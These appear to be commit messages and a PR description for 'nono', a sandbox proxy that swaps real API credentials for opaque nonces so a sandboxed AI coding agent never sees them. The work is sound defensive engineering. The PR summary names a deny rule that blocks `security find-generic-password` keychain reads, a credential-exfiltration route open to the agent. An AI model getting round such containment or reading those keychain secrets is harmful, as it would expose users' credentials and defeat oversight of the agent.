…roxy The mediation server created its own TokenBroker via TokenBroker::new() in session.rs:286, distinct from the proxy's broker passed in via ProxyRuntime.token_resolver. Nonces minted by the mediation shim's capture action lived in the mediation broker's map; the proxy's TLS-intercept egress path queried a different map and got None, forwarding the raw nono_<hex> nonce to upstream which 401'd every request. The bug only surfaced when both sides interacted, which is new with apikey_gateway — oauth_capture's capture+resolve both happen inside the proxy, so PR40's broker has always been shared by construction. Wire a single Arc<TokenBroker>: proxy_runtime now constructs the broker and exposes the Arc via ActiveProxyRuntime.broker. The execution runtime passes it into mediation::session::setup as shared_broker, which falls back to TokenBroker::new() when not provided (preserves pre-existing behavior for command-mediation-only sessions with no proxy involvement). Verified end-to-end: claude apiKeyHelper -> mediation capture -> proxy resolution -> real bearer to gateway -> 200 OK -> PONG. Signed-off-by: Christine Le <christine.le@datadoghq.com> Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
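The shared-broker wiring and its fallback can be sketched as below. The `TokenBroker` here is a toy stand-in with hypothetical `register`/`resolve` methods, and `mediation_broker` is an illustrative name for the "use the shared Arc if given, else create a private broker" choice.

```rust
use std::collections::HashMap;
use std::sync::{Arc, Mutex};

/// Toy stand-in for the real broker: a nonce -> real-token map.
#[derive(Default)]
pub struct TokenBroker {
    tokens: Mutex<HashMap<String, String>>,
}

impl TokenBroker {
    pub fn new() -> Self {
        Self::default()
    }

    pub fn register(&self, nonce: &str, real: &str) {
        self.tokens
            .lock()
            .unwrap_or_else(|e| e.into_inner())
            .insert(nonce.to_string(), real.to_string());
    }

    pub fn resolve(&self, nonce: &str) -> Option<String> {
        self.tokens
            .lock()
            .unwrap_or_else(|e| e.into_inner())
            .get(nonce)
            .cloned()
    }
}

/// Use the proxy's broker when one is provided; otherwise fall back to a
/// private broker (command-mediation-only sessions with no proxy).
pub fn mediation_broker(shared: Option<Arc<TokenBroker>>) -> Arc<TokenBroker> {
    shared.unwrap_or_else(|| Arc::new(TokenBroker::new()))
}
```

With a shared `Arc`, a nonce registered on the mediation side resolves on the proxy side; with two separate brokers it does not, which is the 401 failure mode the commit describes.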
Generalises the two existing provider-specific features
(oauth_capture: true and apikey_gateway: {...}) into a single
configurable primitive, credential_routes: [...]. New provider
integrations (Codex, custom gateways) declare a route entry instead
of adding a new top-level Profile field.
The four orthogonal axes a route declares:
1. capture - where the real token comes from
(OauthIntercept | HelperCommand)
2. delivery - how the agent's HTTP traffic reaches the proxy
(Direct | Redirected with env-var overrides)
3. bearer - header + format carrying the nonce inbound and
the real token outbound
4. preflight - preconditions (NoStaticApiKeySurfaces |
ClaudeCodeApiKeyHelperConfigured)
Everything else (broker, mediation plumbing, nonce resolution,
audit logging) is implicit and handled identically across routes.
Existing profile JSONs keep working unchanged. The legacy
oauth_capture: true and apikey_gateway: {...} fields are translated
into synthesised credential_routes entries at profile-resolve time
(resolve_credential_routes). Downstream code (PreparedSandbox,
ProxyLaunchOptions, start_proxy_runtime, preflight) only sees the
unified representation.
Schema additions in profile/mod.rs:
- ManagedCredentialRoute (the entry type)
- CredentialRouteCapture enum (OauthIntercept | HelperCommand)
- CredentialRouteDelivery enum (Direct | Redirected)
- CredentialEnvOverride (env var to set, with ROUTE_BASE_URL
expansion at runtime)
- CredentialRouteBearer (header + format)
- CredentialRoutePreflight enum (NoStaticApiKeySurfaces |
ClaudeCodeApiKeyHelperConfigured)
- resolve_credential_routes() (legacy shim)
proxy_runtime.rs replaces oauth_capture_routes() +
apikey_gateway_route() with synthesize_proxy_routes(&route) and
build_route_env_overrides(&route, port). Per-feature boolean flags
(oauth_capture_active, apikey_gateway_active) collapse to
broker_required and has_oauth_intercept_route, both derived from
the unified list.
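A rough sketch of the unified representation and the two derived flags. The type and field shapes are assumptions for illustration (the real `ManagedCredentialRoute` carries more), and treating every route as broker-backed in `broker_required` is likewise an assumption of this sketch.

```rust
/// Where the real token comes from (variant payloads are assumed).
#[derive(Debug, Clone, PartialEq)]
pub enum Capture {
    OauthIntercept,
    HelperCommand { argv: Vec<String> },
}

/// How the agent's HTTP traffic reaches the proxy.
#[derive(Debug, Clone, PartialEq)]
pub enum Delivery {
    Direct,
    Redirected { env_overrides: Vec<(String, String)> },
}

/// Preconditions checked before the child is spawned.
#[derive(Debug, Clone, PartialEq)]
pub enum Preflight {
    NoStaticApiKeySurfaces,
    ClaudeCodeApiKeyHelperConfigured,
}

/// Simplified route entry (hypothetical shape).
#[derive(Debug, Clone, PartialEq)]
pub struct Route {
    pub name: String,
    pub capture: Capture,
    pub delivery: Delivery,
    pub bearer_header: String,
    pub preflight: Vec<Preflight>,
}

/// True if any route captures via OAuth response interception.
pub fn has_oauth_intercept_route(routes: &[Route]) -> bool {
    routes.iter().any(|r| matches!(r.capture, Capture::OauthIntercept))
}

/// Assumption: both capture kinds at this commit need the broker,
/// so any declared route requires one.
pub fn broker_required(routes: &[Route]) -> bool {
    !routes.is_empty()
}
```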
oauth_preflight.rs replaces run_oauth_preflight (signature took
ApiKeyGatewayConfig) with run_credential_routes_preflight that
iterates a route slice and dispatches per declared preflight check.
The helper-command coverage check now reads its expected helper
argv from the route's capture config rather than a legacy-shaped
struct.
Verified end-to-end against the existing claude-code-with-ddtool-
gateway.json profile (uses the legacy apikey_gateway: field):
mediation capture -> shared broker -> proxy resolution ->
gateway 200 OK -> PONG.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Adds a new credential route capture type where the proxy itself runs a command in the parent process at startup to fetch and cache a credential, substituting it on every egress request for that route. The sandboxed agent never sees the real credential; the proxy parent is the sole holder.
Key design points:
- ProvisionedStore (nono-proxy): async in-memory cache keyed by route name. provision_all() runs all sources at proxy startup; refresh() re-runs on 401/403 (fire-and-forget). BTreeMap env; Zeroizing storage; concurrent refreshes debounced via per-slot Mutex. 8 unit tests.
- Auto-injection: profile resolution appends a `respond` mediation rule on the source command so claude's apiKeyHelper invocation returns a hardcoded sentinel (PROXY_PROVISIONED_SENTINEL) rather than running the real binary in the sandbox. Conflict detection refuses startup if a manual `capture` rule on the same command/args already exists.
- Egress substitution: both tls_intercept/handle.rs and reverse.rs check route.provisioned_credential_route on egress. If set, the inbound bearer header is replaced with the cached credential. Returns 401 to the sandbox if the agent sent no inbound credential header.
- egress_headers: new field on ManagedCredentialRoute / RouteConfig / LoadedRoute. Headers in this map are injected on every outbound request for the route. Solves the case where the agent does not forward all ANTHROPIC_CUSTOM_HEADERS entries in CONNECT mode (e.g. org-id, provider required by the Datadog AI gateway).
- Live-verified: ddtool gateway route with Direct delivery, provisioned dd-tok-... bearer, egress_headers injecting org-id/source/provider. claude -p "What is 17 * 23?" → 391, gateway status=200.
- Design doc and test profile: 2026-06-11-proxy-provisioned-credential-design.md documents the architecture, deferred future extensions (file/http sources, retry-in-place, periodic refresh), and the Direct-vs-Redirected delivery finding (use Direct; egress_headers covers the missing-header gap).
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
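The egress substitution and `egress_headers` injection described in this commit can be sketched as a pure function over header maps. Everything named here is hypothetical: `rewrite_egress`, the `Egress` enum, lowercase header keys, and the `Bearer <credential>` format are assumptions, since the route's bearer axis defines the real header and format.

```rust
use std::collections::BTreeMap;

/// Outcome of rewriting one outbound request (hypothetical type).
#[derive(Debug, PartialEq)]
pub enum Egress {
    /// Forward upstream with these headers.
    Forward(BTreeMap<String, String>),
    /// Answer the sandbox directly with this status code.
    Reject(u16),
}

/// Replace the inbound credential header with the cached credential and
/// add the route's static egress headers.
pub fn rewrite_egress(
    inbound: &BTreeMap<String, String>,
    bearer_header: &str,
    cached_credential: &str,
    egress_headers: &BTreeMap<String, String>,
) -> Egress {
    // No inbound credential header at all: refuse with 401.
    if !inbound.contains_key(bearer_header) {
        return Egress::Reject(401);
    }
    let mut out = inbound.clone();
    // Whatever the agent sent is overwritten by the cached credential.
    out.insert(bearer_header.to_string(), format!("Bearer {cached_credential}"));
    // Inject headers the agent may not have forwarded.
    for (name, value) in egress_headers {
        out.insert(name.clone(), value.clone());
    }
    Egress::Forward(out)
}
```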
Renames `CredentialRouteCapture::HelperCommand` to `MediatedHelper` and removes the legacy `oauth_capture` / `apikey_gateway` profile fields. `credential_routes: [...]` is now the only way to configure broker-backed credential mediation; profile authors declare each route explicitly rather than toggling per-provider flags.
The rename makes the capture variant readable next to its sibling `ProxyProvisionedCredential`: both run commands, but `MediatedHelper` captures via the mediation seam (sandbox-initiated, parent runs the real binary, broker mints a nonce) while `ProxyProvisionedCredential` runs the command in the proxy parent at startup. The old name `HelperCommand` left that distinction implicit.
Removed:
- `Profile.oauth_capture`, `Profile.apikey_gateway`, `ApiKeyGatewayConfig`
- `resolve_credential_routes` (legacy translation shim) and its 4 tests
- `ProfileDef.oauth_capture` from policy.rs
- `oauth_capture` schema entry
- Display block in `nono profile show` for "OAuth capture: enabled"
Broker-protection auto-injection now triggers on "any route uses `OauthIntercept` capture" instead of the legacy bool. The observable behaviour is the same, derived from the unified representation.
Verified: cargo build --workspace clean; cargo clippy --all-targets -D warnings clean; cargo fmt clean; 1323 nono-cli tests pass. Pre-existing nono::supervisor::socket SUN_LEN failures on this host are unrelated.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Replaces ddtool / ddbuild / rapid-ai-platform / Datadog-internal
hostnames and paths with vendor-neutral examples (my-tool,
gateway.example.com, ~/.cache/example) across docs, fixtures, and the
single live-verification test profile. No logic changes — binary names
and hostnames here are illustrative strings, not load-bearing
identifiers.
Touches:
- crates/nono-cli/src/mediation/policy.rs — the 15 upstream-flagged
refs (doc-comment on `subcommand_matches`, inline comment in
`apply_capture`, three test fixtures).
- crates/nono-cli/src/mediation/{broker,mod}.rs — docstring + 5 test
fixture strings.
- crates/nono-proxy/src/{provisioned.rs,tls_intercept/handle.rs} —
two doc-comment examples.
- docs/cli/features/profile-authoring.mdx + README.md — JSON example
blocks using vendor-neutral command + domain names.
- 2026-06-11-proxy-provisioned-credential-design.md — design-doc
examples and verification command lines.
- claude-code-with-ddtool-gateway.json -> claude-code-with-gateway.json
with internals scrubbed (route name, command, args, upstream URL,
allow_domain entry, filesystem allow path).
Verified: cargo build --workspace clean; cargo clippy --all-targets
-D warnings clean; cargo fmt clean; mediation tests 147 passed.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Removes from the PR:
- `claude-code-with-gateway.json`: local live-verification test profile, not appropriate to ship in the public PR.
- `2026-06-11-proxy-provisioned-credential-design.md`: design doc added alongside the proxy-provisioned-credential commit; review belongs in PR description / commit messages, not a checked-in doc.
- `docs/plans/2026-05-14-mediation-profile-authoring-ux.md`
- `docs/plans/2026-06-03-mediation-based-oauth-capture.md`
The two `docs/plans` files were both introduced by PR #50; they are planning documents that captured pre-implementation decisions and shouldn't ship as repository docs.
No code references the removed files; cargo build + nono-cli tests remain green (1323 passed).
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…rfaces
Three user-facing docs were silent on the credential_routes work that landed in PR #50's lineage and is now generalised in this PR.
- crates/nono-proxy/README.md: add the TLS-intercept proxy mode to the modes table, add a "Credential Routes" section describing the three capture mechanisms (oauth_intercept response-body rewriting, bearer translation, proxy-provisioned credentials with refresh on 401/403) and the egress_headers field, add broker-mediated nonce resolution to security properties, and list the new internal modules (tls_intercept, forward, oauth_rewrite, broker, provisioned, route).
- docs/cli/features/profile-authoring.mdx: add a "Managed Credential Routes" section with the four-axis schema (capture / delivery / bearer / preflight), per-variant descriptions, two worked profile examples (Anthropic OAuth, enterprise gateway), and the preflight checks.
- docs/cli/clients/claude-code.mdx: add a "Broker-Mediated OAuth Capture" subsection under OAuth2 Login showing the minimal credential_routes profile that swaps real tokens for nonces during /login, with a link to the full schema reference.
Signed-off-by: Christine Le <christine.le@datadoghq.com>
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Summary
This PR lets a sandboxed agent talk to the Anthropic API without ever seeing real bearer credentials. Two flows are supported:
- OAuth `/login` against api.anthropic.com. The user runs `claude /login` in the sandbox; the proxy intercepts the OAuth response, swaps the real access and refresh tokens for opaque `nono_<hex>` nonces before the body reaches the agent, and translates the nonces back on every egress request. The captured pair persists in a nono-controlled macOS keychain entry so subsequent sessions resume without re-login.
- API key issued by an enterprise gateway. The proxy parent runs a credential-issuing command at startup, caches the resulting bearer, and substitutes it on every request to the configured gateway upstream. The agent never invokes the credential command and never sees the real bearer, only a fixed placeholder flowing through its `apiKeyHelper` path.
Both flows are declared through a single new profile field, `credential_routes: [{...}]`, with one entry per upstream.
What's in the PR
- OAuth-capture pipeline. Layer 1/1.2/2 bearer translation across the reverse proxy and CONNECT-tunnel TLS intercept paths, with a `TokenResolver` seam and keychain-backed broker persistence (code-signed ACL, orphan GC, refresh-rotation pruning, locked-keychain detection). Auto-injects a mediation refusal rule on subprocess `security find-generic-password` reads of the broker keychain entry so the realistic exfiltration path is closed silently rather than via a dialog the user could be social-engineered through.
- `credential_routes` schema. One `Vec<ManagedCredentialRoute>` with three capture variants (`OauthIntercept`, `MediatedHelper`, `ProxyProvisionedCredential`). Routes choose `Direct` vs `Redirected` delivery, declare their bearer header + format, and may inject `egress_headers` for gateway-required metadata the agent does not always forward in CONNECT mode.
- `proxy_provisioned_credential` capture. The proxy runs the credential-issuing command in its own parent at startup, caches the result in `Zeroizing<String>`, substitutes the credential on egress, and refreshes on 401/403. The sandbox sees only a fixed placeholder. Profile resolution auto-injects a `respond` mediation rule on the source command and refuses startup if a conflicting manual `capture` rule is declared on the same command.
- Shared `TokenBroker`. The mediation server and the proxy share a single broker `Arc` so nonces minted on one side resolve correctly on the other. This is a load-bearing fix: without it the gateway-mediation path 401s on every egress.
Profile Schema
Three capture variants today:
- `oauth_intercept`: TLS-intercept the OAuth response body, mint nonces for access/refresh, substitute in-place before the body reaches the sandbox. Keychain-backed cross-session resume.
- `mediated_helper`: sandboxed agent invokes a helper command (e.g. Claude Code's `apiKeyHelper`); the mediation shim intercepts in the parent, runs the real binary there, mints a nonce on stdout, and returns the nonce to the sandbox.
- `proxy_provisioned_credential`: proxy parent runs the credential-issuing command at startup, caches the result, refreshes on 401/403. Sandbox never invokes the helper; sees only a placeholder.
Future capture variants (file source, HTTP source for STS / IMDS, and non-bearer egress signing such as SigV4) extend `ProvisionSource` and the bearer axis without needing new top-level profile fields.
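For reviewers who want a concrete picture of the nonce swap and of why the broker has to be shared, here is a minimal sketch. It is not the PR's implementation: `SketchBroker`, `shared_broker`, `rewrite_ingress`, and `rewrite_egress` are hypothetical names, the real `TokenBroker` API is not shown in this description, and the counter-based nonce is an assumption made only to keep the example free of dependencies (a real broker would need unpredictable nonces).

```rust
use std::collections::HashMap;
use std::sync::atomic::{AtomicU64, Ordering};
use std::sync::{Arc, Mutex};

/// Hypothetical stand-in for the PR's `TokenBroker` (real API not shown here).
#[derive(Default)]
pub struct SketchBroker {
    /// Maps each minted nonce to the real credential it stands for.
    tokens: Mutex<HashMap<String, String>>,
    /// Counter used only to make nonces unique in this sketch.
    /// Assumption: a real broker would draw nonces from a CSPRNG instead.
    next_id: AtomicU64,
}

impl SketchBroker {
    /// Store the real credential and return an opaque `nono_<hex>` nonce.
    pub fn mint(&self, real: &str) -> String {
        let id = self.next_id.fetch_add(1, Ordering::Relaxed);
        let nonce = format!("nono_{:016x}", id);
        self.tokens
            .lock()
            .unwrap()
            .insert(nonce.clone(), real.to_string());
        nonce
    }

    /// Translate a nonce back to the real credential, if this broker minted it.
    pub fn resolve(&self, nonce: &str) -> Option<String> {
        self.tokens.lock().unwrap().get(nonce).cloned()
    }
}

/// Both sides must hold clones of the same `Arc`; two separately
/// constructed brokers would not know each other's nonces.
pub fn shared_broker() -> Arc<SketchBroker> {
    Arc::new(SketchBroker::default())
}

/// Ingress: replace the real token in a response body before the sandbox sees it.
pub fn rewrite_ingress(broker: &SketchBroker, body: &str, real_token: &str) -> String {
    let nonce = broker.mint(real_token);
    body.replace(real_token, &nonce)
}

/// Egress: swap a nonce bearer for the real one.
/// Returns `None` when the value is not a bearer this broker can resolve.
pub fn rewrite_egress(broker: &SketchBroker, header_value: &str) -> Option<String> {
    let candidate = header_value.strip_prefix("Bearer ")?;
    let real = broker.resolve(candidate)?;
    Some(format!("Bearer {}", real))
}
```

In this sketch, a nonce minted through one clone of the `Arc` resolves through any other clone, while a second, independently constructed broker returns `None` for the same nonce. That second case is the failure mode the shared-broker bullet describes, where every egress request would go upstream with an unresolvable bearer.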